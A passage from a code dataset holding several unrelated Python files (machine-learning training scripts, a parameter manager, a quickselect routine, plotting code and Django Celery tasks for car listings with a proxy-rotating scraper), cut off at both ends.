","repo_name":"Tw0Brainz/spotify-queue-ocr-monitor","sub_path":"vrc/osc_notifier.py","file_name":"osc_notifier.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8698517101","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 19:36:01 2020\n\n@author: OCAC\n\"\"\"\n\nlength=float(input(\"Enter length:\"))\nwidth=float(input(\"Enter width:\"))\narea=length*width\narea_acres=area/43560\nprint(\"The area of the field is:\",area_acres,\"acres\")","repo_name":"AnkitM18-tech/Python-Introductory-Problems","sub_path":"1.Introductory/FieldArea.py","file_name":"FieldArea.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73168926564","text":"import torch\nfrom torch import nn\nimport torchvision\n\nfrom models.modules import Resnet, TemporalConvNet\n\n\nclass ResNetLSTM(nn.Module):\n\n\tdef __init__(self, n_classes=600, resnet_layers=101, hidden_size=1024, layers=2):\n\t\tsuper(ResNetLSTM, self).__init__()\n\t\tself.cnn = 
Resnet(layers=resnet_layers, output_dims=512)\n\t\tself.lstm = nn.LSTM(\n\t\t\tinput_size = 512,\n\t\t\thidden_size = hidden_size,\n\t\t\tnum_layers = layers,\n\t\t\tbidirectional = True,\n\t\t)\n\t\tself.statesize = (layers*2, 1, hidden_size)\n\t\tself.outputsize = 2 * hidden_size\n\t\tself.state = self.init_state(self.statesize, None)\n\t\tself.temporal_pooling = \"mean\"\n\t\tself.fc = nn.Linear(self.outputsize, n_classes)\n\n\tdef forward(self, x):\n\t\tn, c, f, h, w = x.shape\n\t\tx = x.permute(0, 2, 1, 3, 4) # (n,c,f,h,w) -> (n,f,c,h,w)\n\t\tx = x.reshape(n*f, c, h, w)\n\t\tx = self.cnn(x)\n\t\tx = x.reshape(n, f, -1).permute(1, 0, 2)\n\t\tself.lstm.flatten_parameters()\n\t\t# the hidden state must match the actual batch size n, not the fixed size of 1\n\t\tstate_size = (self.statesize[0], n, self.statesize[2])\n\t\toutput, _ = self.lstm(x, self.init_state(state_size, x.device))\n\t\tif self.temporal_pooling == \"mean\": output = torch.mean(output, dim=0)\n\t\telse: output = output[-1]\n\t\toutput = self.fc(output)\n\t\treturn output\n\n\tdef init_state(self, size, device):\n\t\treturn torch.zeros(size).to(device), torch.zeros(size).to(device)\n\nclass ResNetTCN(nn.Module):\n\n\tdef __init__(self, n_classes=600, resnet_layers=101, hidden_size=1024, layers=2):\n\t\tsuper(ResNetTCN, self).__init__()\n\t\tself.cnn = Resnet(layers=resnet_layers, output_dims=512)\n\t\tself.tcn = TemporalConvNet(512, [hidden_size]*layers)\n\t\tself.fc = nn.Linear(hidden_size, n_classes)\n\t\tself.temporal_pooling = \"mean\"\n\n\tdef forward(self, x):\n\t\tn, c, f, h, w = x.shape\n\t\tx = x.permute(0, 2, 1, 3, 4) # (n,c,f,h,w) -> (n,f,c,h,w)\n\t\tx = x.reshape(n*f, c, h, w)\n\t\tx = self.cnn(x)\n\t\tx = x.reshape(n, f, -1).permute(0, 2, 1)\n\t\toutput = self.tcn(x)\n\t\tif self.temporal_pooling == \"mean\": output = torch.mean(output, dim=2)\n\t\telse: output = output[:, :, -1]\n\t\toutput = self.fc(output)\n\t\treturn output\n","repo_name":"flixpar/ActivityRecognition","sub_path":"models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
+{"seq_id":"17566395401","text":"import tensorflow as tf\nfrom transformers import TFGPT2LMHeadModel, GPT2Config \nfrom dataloader.load_data import read_gpt_tfrecord, read_ctx_tfrecord\nfrom dataloader.tfrecord_utils import load_from_gcs\nfrom glob import glob\nfrom config import *\nfrom google.cloud import storage\nfrom distribute.utils import setup_strategy\nfrom trainer.criterion import pad_masked_cce\n\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, ModelCheckpoint\n\nstrategy, num_replica = setup_strategy()\nbatch_size = (BS // num_replica) * num_replica\nif num_replica == 1:\n batch_size = 1\n\ndef create_model(max_len=256):\n config = GPT2Config(**GPT_SMALL_CONFIG)\n input_ids = tf.keras.layers.Input(shape=(max_len,), dtype='int32')\n gpt = TFGPT2LMHeadModel(config)\n out = gpt(input_ids).logits\n model = tf.keras.Model(inputs=input_ids, outputs=out)\n if IS_LOAD:\n load_path = LOAD_PATH \n model.load_weights(load_path)\n print(f'loaded from {load_path}!!')\n # model = TFGPT2LMHeadModel(config)\n optimizer = tf.keras.optimizers.Adam(learning_rate=LR)\n model.compile(\n optimizer=optimizer,\n # loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n loss=pad_masked_cce\n )\n return model\n\nwith strategy.scope():\n model = create_model()\n\n\n# train_from = glob('data/everytime/*.tfrecord', recursive=True)\n# train_from = load_from_gcs('nlp-pololo', prefix=['gpt_tfrecord/everytime/'])\ntrain_from = load_from_gcs('nlp-pololo', prefix=['context_tfrecord/everytime/', 
'context_tfrecord/aihub_sns', 'context_tfrecord/kakao'],\\\n sort_key=lambda path: 0 if 'everytime' in path else 1)\n# train_from = train_from[:1]\nprint(train_from)\n\n# dset = read_gpt_tfrecord(train_from).shuffle(buffer_size=20000)\ndset = read_ctx_tfrecord(train_from, with_mask=True).shuffle(buffer_size=20000)\ndset = dset.padded_batch(batch_size, padded_shapes=(MAX_SEQ_LEN, MAX_SEQ_LEN),\\\n padding_values=tf.constant(0, dtype=tf.int64), drop_remainder=True)\n\nskip_point = 1000 \ntrain_set, val_set = dset.skip(skip_point), dset.take(skip_point)\nprint('splitting train/val set..')\n\ntrain_set = strategy.experimental_distribute_dataset(train_set.repeat())\nval_set = strategy.experimental_distribute_dataset(val_set)\n\ntrain_steps = 2000000 // BS + 1\nval_steps = skip_point \n\n\ncallbacks = [\n # EarlyStopping(monitor='val_loss', patience=10), \n # ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, min_lr=_learning_rate * 0.05),\n ModelCheckpoint(f\"ckpts/best.h5\",\n monitor='val_loss', \n save_best_only=True,\n save_weights_only=True,\n mode='auto')\n # WandbCallback(),\n ]\n\n\nprint(f'train batch size={batch_size}, lr={LR}')\nmodel.fit(train_set,\n epochs=EPOCHS,\n steps_per_epoch=train_steps,\n callbacks=callbacks,\n validation_data=val_set,\n validation_steps=val_steps\n )","repo_name":"5yearsKim/EverytimeGPT","sub_path":"fit_gpt.py","file_name":"fit_gpt.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15860736339","text":"\"\"\"\nThe ParameterManager controls the handles importing \nthe parameters from the params.yaml file. These\nfunctions don't need to be accessed by the end user.\n\"\"\"\n\nimport __main__\nimport os\n\n### Get the name of program importing this package ###\nif hasattr(__main__,\"__file__\"):\n main_file = os.path.basename(__main__.__file__)\nelse:\n main_file = \"ipython\"\n \n### This checks if we are just doing documentation ###\nif main_file != \"sphinx-build\":\n import yaml\n import datetime\n import numpy as np\n from math import ceil\n import shutil\n from dolfin import *\n import sys\n import ast\n\n # set_log_level(LogLevel.CRITICAL)\n\n######################################################\n### Collect all options and define general options ###\n######################################################\n\n\n### THis is a special class that allows prints to go to file and terminal\nclass Logger(object):\n def __init__(self,filename):\n self.terminal = sys.stdout\n self.log = open(filename, \"a\")\n self.log.seek(0)\n self.log.truncate()\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message) \n\n def flush(self):\n self.terminal.flush()\n self.log.flush()\n pass \n\nclass Parameters(dict):\n \"\"\"\n Parameters is a subclass of pythons *dict* that adds\n function specific to windse.\n \"\"\"\n def __init__(self):\n super(Parameters, self).__init__()\n self.current_tab = 0\n\n def NestedUpdate(self,dic,keys,value):\n if len(keys) > 1:\n next_dic = dic.setdefault(keys[0],{})\n self.NestedUpdate(next_dic,keys[1:],value)\n elif len(keys) == 1:\n current_value = dic.get(keys[0],\"\")\n if isinstance(current_value,int):\n dic[keys[0]] = int(value)\n elif isinstance(current_value,float):\n dic[keys[0]] = float(value)\n elif isinstance(current_value,str):\n dic[keys[0]] = value\n elif isinstance(current_value,list):\n dic[keys[0]] = ast.literal_eval(value)\n\n\n def Load(self, loc,updated_parameters=[]):\n 
\"\"\"\n This function loads the parameters from the .yaml file. \n It should only be assessed once from the :meth:`windse.initialize` function.\n\n Args:\n loc (str): This string is the location of the .yaml parameters file.\n\n \"\"\"\n\n ### Load the yaml file (requires PyYaml)\n yaml_file = yaml.load(open(loc),Loader=yaml.SafeLoader)\n\n ### update any parameters if supplied ###\n for p in updated_parameters:\n keys_list = p.split(\":\")\n self.NestedUpdate(yaml_file,keys_list[:-1],keys_list[-1])\n\n ### Set the parameters\n self.update(yaml_file)\n\n ### Create Instances of the general options ###\n self.name = self[\"general\"].get(\"name\", \"Test\")\n self.preappend_datetime = self[\"general\"].get(\"preappend_datetime\", False)\n self.output_type = self[\"general\"].get(\"output_type\", \"pvd\")\n self.dolfin_adjoint = self[\"general\"].get(\"dolfin_adjoint\", False)\n self.output = self[\"general\"].get(\"output\", [\"solution\"])\n\n ### Print some stats ###\n\n ### Set up the folder Structure ###\n timestamp=datetime.datetime.today().strftime('%Y%m%d_%H%M%S')\n fancytimestamp=datetime.datetime.today().strftime('%Y/%m/%d_%H:%M:%S')\n if self.preappend_datetime:\n self.name = timestamp+\"-\"+self.name\n self[\"general\"][\"name\"]=self.name\n self.folder = \"output/\"+self.name+\"/\"\n self[\"general\"][\"folder\"] = self.folder\n\n ### Make sure folder exists ###\n if not os.path.exists(self.folder): os.makedirs(self.folder)\n if not os.path.exists(self.folder+\"input_files/\"): os.makedirs(self.folder+\"input_files/\")\n \n ### Setup the logger ###\n self.log = self.folder+\"log.txt\"\n sys.stdout = Logger(self.log)\n\n ### Copy params file to output folder ###\n shutil.copy(loc,self.folder+\"input_files/\")\n\n ### Create checkpoint if required ###\n # if self.save_file_type == \"hdf5\":\n # self.Hdf=HDF5File(MPI.mpi_comm(), self.folder+\"checkpoint/checkpoint.h5\", \"w\")\n\n ### Print some more stuff\n self.fprint(\"General Parameter Information\", special=\"header\")\n self.fprint(\"Run Name: {0}\".format(self.name))\n self.fprint(\"Run Time Stamp: {0}\".format(fancytimestamp))\n self.fprint(\"Output Folder: {0}\".format(self.folder))\n if updated_parameters:\n self.fprint(\"Updated Parameter:\")\n for i,p in enumerate(updated_parameters):\n self.fprint(\"{:d}: {:}\".format(i,p),offset=1)\n self.fprint(\"Parameters Setup\", special=\"footer\")\n\n def Read(self):\n \"\"\"\n This function reads the current state of the parameters object \n and prints it in a easy to read way.\n \"\"\"\n for group in self:\n print(group)\n max_length = 0\n for key in self[group]:\n max_length = max(max_length,len(key))\n max_length = max_length\n for key in self[group]:\n print(\" \"+key+\": \"+\" \"*(max_length-len(key))+repr(self[group][key]))\n\n def Save(self, func, filename, subfolder=\"\",val=0,file=None,filetype=\"default\"):\n \"\"\"\n This function is used to save the various dolfin.Functions created\n by windse. It should only be accessed internally.\n\n Args:\n func (dolfin.Function): The Function to be saved\n filename (str): the name of the function\n\n :Keyword Arguments:\n * **subfolder** (*str*): where to save the files within the output folder\n * **n** (*float*): used for saving a series of output. 
Use n=0 for the first save.\n\n \"\"\"\n self.fprint(\"Saving: {0}\".format(filename))\n\n # if not isinstance(init_func,Function):\n # func = Function(func)\n # else:\n # func = init_func\n\n ### Name the function in the meta data, This should probably be done at creation\n old_filename = func.name()\n func.rename(filename,filename)\n\n if filetype == \"default\":\n filetype = self.output_type\n\n if file is None:\n ### Make sure the folder exists\n if not os.path.exists(self.folder+subfolder): os.makedirs(self.folder+subfolder)\n\n if filetype == \"pvd\":\n file_string = self.folder+subfolder+filename+\".pvd\"\n out = File(file_string)\n out << (func,val)\n elif filetype == \"xdmf\":\n file_string = self.folder+subfolder+filename+\".xdmf\"\n out = XDMFFile(file_string)\n out.write(func,val)\n\n func.rename(old_filename,old_filename)\n return out\n\n else:\n if filetype == \"pvd\" or isinstance(func,type(Mesh)):\n file << (func,val)\n elif filetype == \"xdmf\":\n file.write(func,val)\n\n func.rename(old_filename,old_filename)\n return file\n\n def fprint(self,string,tab=None,offset=0,special=None):\n \"\"\"\n This is just a fancy print function that will tab according to where\n we are in the solve\n\n Args:\n string (str): the string for printing\n\n :Keyword Arguments:\n * **tab** (*int*): the tab level\n\n \"\"\"\n ### Check Processor ###\n rank = 0\n if rank == 0:\n ### Check if tab length has been overridden\n if tab is None:\n tab = self.current_tab\n \n ### Check if we are starting or ending a section\n if special==\"header\":\n self.current_tab += 1\n self.fprint(\"\",tab=tab)\n elif special ==\"footer\":\n self.current_tab -= 1\n tab -= 1\n self.fprint(\"\",tab=tab+1)\n\n ### Apply Offset if provided ###\n tab += offset\n\n ### Create Tabbed string ###\n tabbed = \"| \"*tab\n\n ### Apply Tabbed string ###\n if isinstance(string,str):\n string = tabbed+string\n else:\n string = tabbed+repr(string)\n\n ### Print ###\n # print(string, flush=True)\n print(string)\n sys.stdout.flush()\n\n if special==\"header\":\n self.fprint(\"\",tab=tab+1)\n\nwindse_parameters = Parameters()","repo_name":"michalehu/WindSE","sub_path":"windse/ParameterManager.py","file_name":"ParameterManager.py","file_ext":"py","file_size_in_byte":8609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"6644287930","text":"#!/usr/bin/python\n#coding:utf-8\n\n\"\"\"\n@author: wuxikun\n@software: PyCharm Community Edition\n@file: deep_learn_process.py\n@time: 12/21/18 3:31 PM\n\"\"\"\n\nimport os\nimport sys\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nsys.path.append(os.path.split(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))[0])\n\nimport pickle\nfrom src.datasets import Datesets\nfrom keras.layers import Embedding, Dense, LSTM, Dropout\nfrom keras.preprocessing import sequence\nfrom keras.models import Model, Sequential\nimport numpy as np\nimport keras.backend as K\nfrom keras.utils import np_utils\nimport tensorflow as tf\nimport keras.backend.tensorflow_backend as KTF\nfrom keras import regularizers, optimizers\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" # 使用编号为1,2号的GPU\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.5 # 每个GPU现存上界控制在50%以内\nsession = tf.Session(config=config)\n\nKTF.set_session(session)\n\n(raw_datas, labels) = Datesets.load_data(\"in_hospital\")\nraw_datas = [list(set(data.split(' '))) for data in 
raw_datas]\n\nbatch_size = 32\nepochs = 50\n\ntrain_size = int(len(labels) * 0.8)\ntrain_x = raw_datas[:train_size]\ntrain_y = labels[:train_size]\ntest_x = raw_datas[train_size:]\ntest_y = labels[train_size:]\n\nw2id_path = '../data/word2id.pkl'\nmax_length = max([len(usr) for usr in train_x])\n# max_steps = max([len(_) for _ in train_x]) # 文书最多个数\n\n\nif not os.path.exists(w2id_path):\n words = set()\n for docs in train_x:\n for record in docs:\n record_list = record.split(' ')\n words = (words | set(record_list))\n word_indices = {v: i for i, v in enumerate(words)}\n pickle.dump(word_indices, open(w2id_path, 'wb+'))\nelse:\n word_indices = pickle.load(open(w2id_path, 'rb'))\n\n\ndef vecotr_list(sent_list, wordIndices):\n res = [word_indices[v] for v in sent_list if v in wordIndices]\n return res\n\ndef vector_sentence(sentence, wordIndices):\n sent_list = sentence.strip().split(' ')\n return vecotr_list(sent_list, wordIndices)\n\ntrain_x = [vecotr_list(doc, word_indices) for doc in train_x]\ntest_x = [vecotr_list(doc, word_indices) for doc in test_x]\ntrain_x = sequence.pad_sequences(train_x, max_length)\ntest_x = sequence.pad_sequences(test_x, max_length)\n\ntest_x = np.array(test_x)\ntest_y = np.array(test_y)\ntrain_x = np.array(train_x)\ntrain_y = np.array(train_y)\n\nprint(train_x[0].shape)\n\nmodel = Sequential()\nmodel.add(Embedding(len(word_indices), output_dim=128, name='embedding', dropout=0.4410))\nmodel.add(Dense(100))\nmodel.add(LSTM(279))\nmodel.add(Dense(20))\nmodel.add(Dense(1, activation='linear'))\n\nsgd = optimizers.SGD(lr=0.1, decay=1e-6, clipnorm=11.16,momentum=0.9, nesterov=True)\n\nmodel.compile(loss='mean_squared_error',\n optimizer=sgd,\n metrics=['accuracy'])\n\nmodel.fit(train_x, train_y, batch_size=batch_size, epochs=epochs, validation_data=(test_x, test_y))\nmodel.save('in_hospital.h5')\n","repo_name":"Alucardmini/ehr_paper","sub_path":"src/deep_learn_process.py","file_name":"deep_learn_process.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27546002186","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@File : jknet_trainer.py\n@Time : 2022/4/10 11:16 A.M.\n@Author : Jia Yiming\n\"\"\"\n\nimport os\n# os.environ['CUDA_VISIBLE_DEVICES']='0'\n# os.environ['TL_BACKEND'] = 'torch'\nimport argparse\nimport tensorlayerx as tlx\nfrom gammagl.datasets import Planetoid\nfrom gammagl.models import JKNet\nfrom tensorlayerx.model import TrainOneStep, WithLoss\nfrom gammagl.utils import add_self_loops, calc_gcn_norm, mask_to_index, set_device\n\nclass SemiSpvzLoss(WithLoss):\n def __init__(self, net, loss_fn):\n super(SemiSpvzLoss, self).__init__(backbone=net, loss_fn=loss_fn)\n\n def forward(self, data, y):\n logits = self.backbone_network(data['x'], data['edge_index'], data['edge_weight'], data['num_nodes'])\n train_logits = tlx.gather(logits, data['train_idx'])\n train_y = tlx.gather(data['y'], data['train_idx'])\n loss = self._loss_fn(train_logits, train_y)\n return loss\n\n\ndef calculate_acc(logits, y, metrics):\n \"\"\"\n Args:\n logits: node logits\n y: node labels\n metrics: tensorlayerx.metrics\n Returns:\n rst\n \"\"\"\n\n metrics.update(logits, y)\n rst = metrics.result()\n metrics.reset()\n return rst\n\ndef main(args):\n # load cora dataset\n # set_device(5)\n if str.lower(args.dataset) not in ['cora', 'pubmed', 'citeseer']:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n dataset = Planetoid(args.dataset_path, args.dataset)\n dataset.process() 
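    # [editor's aside] minimal sketch, not part of the original trainer: gammagl's calc_gcn_norm used a few lines below computes the symmetric GCN edge normalisation w(i, j) = 1 / sqrt(deg(i) * deg(j)); a numpy equivalent under those assumptions (hypothetical names; edge_index is assumed to be a (2, E) integer array that already contains self-loops, so degrees are nonzero):\n    import numpy as _np\n    def _gcn_norm_sketch(edge_index, num_nodes):\n        # per-node degree counted from the destination endpoints\n        src, dst = edge_index\n        deg = _np.bincount(dst, minlength=num_nodes).astype(_np.float64)\n        # one weight per edge: deg(src)^-1/2 * deg(dst)^-1/2\n        return 1.0 / _np.sqrt(deg[src] * deg[dst])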
# suggest to execute explicitly so far\n graph = dataset[0]\n\n edge_index, _ = add_self_loops(graph.edge_index, num_nodes=graph.num_nodes, n_loops=args.self_loops)\n edge_weight = tlx.convert_to_tensor(calc_gcn_norm(edge_index, graph.num_nodes))\n\n useful_node = 0\n useful_index = []\n useful_mask = []\n for i in range(graph.num_nodes):\n new = graph.train_mask[i] or graph.test_mask[i] or graph.val_mask[i]\n useful_mask.append(new)\n if new:\n useful_index.append(i)\n useful_node += 1\n useful_mask = tlx.convert_to_tensor(useful_mask)\n train_num = int(useful_node * 0.6)\n val_num = int(useful_node * 0.2)\n test_num = useful_node - train_num - val_num\n\n graph.train_mask = graph.train_mask.cpu().numpy()\n graph.val_mask = graph.val_mask.cpu().numpy()\n graph.test_mask = graph.test_mask.cpu().numpy()\n\n\n graph.train_mask[:] = False\n graph.train_mask[useful_index[:train_num]] = True\n graph.val_mask[:] = False\n graph.val_mask[useful_index[train_num:train_num + val_num]] = True\n graph.test_mask[:] = False\n graph.test_mask[useful_index[train_num + val_num:train_num + val_num + test_num]] = True\n\n graph.tensor()\n\n # for mindspore, it should be passed into node indices\n train_idx = mask_to_index(graph.train_mask)\n test_idx = mask_to_index(graph.test_mask)\n val_idx = mask_to_index(graph.val_mask)\n\n net = JKNet(dataset=dataset,\n mode=args.mode,\n num_layers=args.iter_K,\n drop=args.drop_rate)\n\n optimizer = tlx.optimizers.Adam(lr=args.lr, weight_decay=args.weight_decay)\n metrics = tlx.metrics.Accuracy()\n train_weights = net.trainable_weights\n\n loss_func = SemiSpvzLoss(net, tlx.losses.softmax_cross_entropy_with_logits)\n train_one_step = TrainOneStep(loss_func, optimizer, train_weights)\n\n data = {\n \"x\": graph.x,\n \"y\": graph.y,\n \"edge_index\": edge_index,\n \"edge_weight\": edge_weight,\n \"train_idx\": train_idx,\n \"test_idx\": test_idx,\n \"val_idx\": val_idx,\n \"num_nodes\": graph.num_nodes,\n }\n\n best_val_acc = 0\n for epoch in range(args.n_epoch):\n net.set_train()\n train_loss = train_one_step(data, graph.y)\n\n net.set_eval()\n logits = net(data['x'], data['edge_index'], data['edge_weight'], data['num_nodes'])\n val_logits = tlx.gather(logits, data['val_idx'])\n val_y = tlx.gather(data['y'], data['val_idx'])\n val_acc = calculate_acc(val_logits, val_y, metrics)\n\n print(\"Epoch [{:0>3d}] \".format(epoch + 1) \\\n + \" train loss: {:.4f}\".format(train_loss.item()) \\\n + \" val acc: {:.4f}\".format(val_acc))\n\n # save best model on evaluation set\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n net.save_weights(args.best_model_path + net.name + \".npz\", format='npz_dict')\n\n net.load_weights(args.best_model_path + net.name + \".npz\", format='npz_dict')\n if tlx.BACKEND == 'torch':\n net.to(data['x'].device)\n\n net.set_eval()\n logits = net(data['x'], data['edge_index'], data['edge_weight'], data['num_nodes'])\n test_logits = tlx.gather(logits, data['test_idx'])\n test_y = tlx.gather(data['y'], data['test_idx'])\n test_acc = calculate_acc(test_logits, test_y, metrics)\n print(\"Test acc: {:.4f}\".format(test_acc))\n\n\nif __name__ == '__main__':\n # parameters setting\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--lr\", type=float, default=0.01, help=\"learnin rate\")\n parser.add_argument(\"--weight_decay\", type=float, default=1e-3, help=\"Adam weight decay\")\n parser.add_argument(\"--n_epoch\", type=int, default=200, help=\"number of epoch\")\n parser.add_argument(\"--hidden_dim\", type=int, default=16, help=\"dimention of 
hidden layers\")\n parser.add_argument(\"--drop_rate\", type=float, default=0.5, help=\"drop rate\")\n parser.add_argument(\"--iter_K\", type=int, default=6, help=\"number K of iteration\")\n parser.add_argument(\"--l2_coef\", type=float, default=1e-3, help=\"l2 loss coeficient\")\n parser.add_argument('--dataset', type=str, default='cora', help='dataset')\n parser.add_argument(\"--dataset_path\", type=str, default=r'', help=\"path to save dataset\")\n parser.add_argument(\"--best_model_path\", type=str, default=r'./', help=\"path to save best model\")\n parser.add_argument(\"--self_loops\", type=int, default=1, help=\"number of graph self-loop\")\n parser.add_argument(\"--mode\", type=str, default='max', help=\"mode of jumping knowledge, optional=['max', 'cat', 'lstm']\")\n\n args = parser.parse_args()\n main(args)","repo_name":"BUPT-GAMMA/GammaGL","sub_path":"examples/jknet/jknet_trainer.py","file_name":"jknet_trainer.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"52"} +{"seq_id":"40362692798","text":"from random import randrange\n\nclass Solution:\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n return self.find_kth_smallest(0, len(nums) - 1, nums, len(nums)+1-k)\n\n def find_kth_smallest(self, low, high, nums, k):\n if low == high:\n return nums[low]\n\n mid = self.partition(low, high, nums)\n if mid - low == k - 1:\n return nums[mid]\n elif mid - low > k - 1:\n return self.find_kth_smallest(low, mid-1, nums, k)\n else:\n return self.find_kth_smallest(mid+1, high, nums, k-(mid-low+1))\n\n def partition(self, low, high, nums):\n i = low - 1\n pivot = nums[high]\n\n for j in range(low, high):\n print(i)\n if nums[j] <= pivot:\n i += 1\n nums[i], nums[j] = nums[j], nums[i]\n nums[i+1], nums[high] = nums[high], nums[i+1]\n print(nums)\n return i + 1\n","repo_name":"steventhan/algo-review","sub_path":"quick_select.py","file_name":"quick_select.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35918549173","text":"# -*- coding: utf-8 -*-\nfrom redis import Redis\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\n\n\nmatplotlib.matplotlib_fname()\nplt.rcParams['font.sans-serif'] = ['YaHei Consolas Hybrid']\nplt.rcParams['axes.unicode_minus'] = False\n\nr = Redis(host=\"localhost\", port=6379, db=2)\nword_tag = ['买卖交易', '求助', '校园生活', '学校新闻', '网络', '情感']\nword_tag = [word.decode('utf-8') for word in word_tag]\n\n\ndef get_every_type_max():\n hot = []\n for word in word_tag:\n temp = []\n for i in range(1, 5):\n if r.lrange(word + ':cluster:' + str(i), 0, -1):\n j = r.lrange(word + ':cluster:' + str(i), 0, -1)[0]\n print(j)\n temp.append(float(j.decode('utf-8')))\n hot.append(max(temp))\n print(hot)\n return hot\n\n\ndef show_histgoram(hot):\n number = int(len(hot))\n ind = np.arange(number)\n hot = tuple(hot)\n fig, axes = plt.subplots(1, 1)\n rects = axes.bar(ind, hot, width=0.35, color='yellow', align='center', yerr=0.00000001)\n x_label = tuple(word_tag)\n axes.set_ylabel(u'最大热度值')\n axes.set_title(u'聚类结果各类别的最大热度值')\n axes.set_xticks(ind)\n axes.set_xticklabels(x_label)\n axes.legend((rects,), (u'热度',))\n for rect in rects:\n height = rect.get_height()\n axes.text(rect.get_x() + rect.get_width() / 2, 1.03 * height,\n '%.2f' % float(height), ha='center', va='bottom')\n plt.savefig('hot.png')\n\n\nif __name__ == 
'__main__':\n hot = get_every_type_max()\n show_histgoram(hot)\n","repo_name":"guoweikuang/analyse_web","sub_path":"weibo_showing/app/python_analyse/product_picture.py","file_name":"product_picture.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14646222764","text":"from celery import shared_task\nfrom listing.models import Listing\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom random import shuffle\nfrom time import sleep\nimport sqlite3\nfrom random import choice,sample\nimport os\nfrom greenwood.settings import BASE_DIR\n\nPATH_TO_DB=os.path.join(BASE_DIR, 'Otomoto_cars.db')\n\n@shared_task()\ndef test_task():\n return \"Hi, I am workong\"\n\n\n\n\n@shared_task()\ndef select_listings_for_hp():\n all_marked=Listing.objects.filter(is_main=True)\n for l in all_marked:\n l.is_main=False\n print(f'cнял отметку {l.id}')\n l.save()\n\n all_entries = list(Listing.objects.all())\n random_items = sample(all_entries, 6)\n\n shuffle(all_entries)\n for l in random_items:\n l.is_main=True\n print(f'отметил {l.id}')\n l.save()\n\n\n return\n\n@shared_task()\ndef select_listings_for_catalog():\n Listing.objects.all().delete()\n cann = sqlite3.connect(PATH_TO_DB)\n cursor = cann.cursor()\n elements = cursor.execute(f\"\"\"SELECT * FROM Listings\"\"\")\n elements = elements.fetchall()\n cann.commit()\n shuffle(elements)\n for i in range(0, 50):\n print(elements[i])\n element=elements[i]\n title=element[-1]\n price=element[1]\n\n print(price)\n year=element[2]\n fuel=element[3]\n city=element[5]\n odometr=element[6]\n volume=element[8]\n listing_link=element[0]\n mark=element[10]\n model=element[11]\n image_url=element[-2]\n l = Listing(title=title,price=price,year=year,fuel=fuel,city=city,odometr=odometr,volume=volume,\n listing_link=listing_link,model=f'{mark} {model}',image_url=image_url)\n print (l.title)\n l.save()\n\n return\n\n\n\ndef parser(link): #request+text via proxies\n proxies = ['54.38.218.215:6582', '125.17.80.226:8080', '54.38.155.89:6582', '151.232.72.12:80', '151.232.72.18:80',\n '151.232.72.20:80', '151.232.72.16:80', '103.147.134.218:8080', '182.71.200.50:80', '151.232.72.15:80',\n '188.166.237.61:3128', '147.135.7.120:3128', '59.120.117.244:80', '163.172.29.94:3838',\n '104.244.99.186:80', '142.44.221.126:8080', '128.199.214.87:3128', '88.99.10.251:1080',\n '185.61.92.207:43947', '195.189.60.97:3128', '201.75.0.51:53281', '151.232.72.22:80',\n '45.137.216.118:80', '95.174.67.50:18080', '151.232.72.23:80', '151.232.72.14:80', '83.97.23.90:18080',\n '103.146.177.39:80', '165.22.64.68:36918', '165.22.81.30:39686', '88.99.10.254:1080', '167.71.5.83:3128',\n '169.57.1.84:8123', '161.202.226.194:80', '105.27.238.161:80', '78.47.16.54:80', '151.232.72.19:80',\n '64.71.145.122:3128', '54.38.219.100:6582', '191.96.42.80:8080', '157.230.103.91:38609',\n '173.192.128.238:25', '88.198.24.108:8080', '81.201.60.130:80', '80.48.119.28:8080', '159.8.114.37:8123',\n '37.120.192.154:8080', '163.172.213.218:3838', '162.144.106.245:3838', '85.238.104.235:47408',\n '43.248.24.158:51166', '173.212.202.65:80', '20.185.176.102:80', '13.209.155.88:8080',\n '213.230.107.125:3128', '202.40.188.94:40486', '113.254.85.88:8193', '52.157.97.234:80',\n '131.108.61.46:3128', '152.0.201.164:999', '103.57.70.248:52000', '162.144.36.187:3838',\n '119.82.253.123:36169', '85.10.219.97:1080', '183.87.153.98:49602', '144.76.214.154:1080',\n '203.202.245.58:80', '104.45.188.43:3128', 
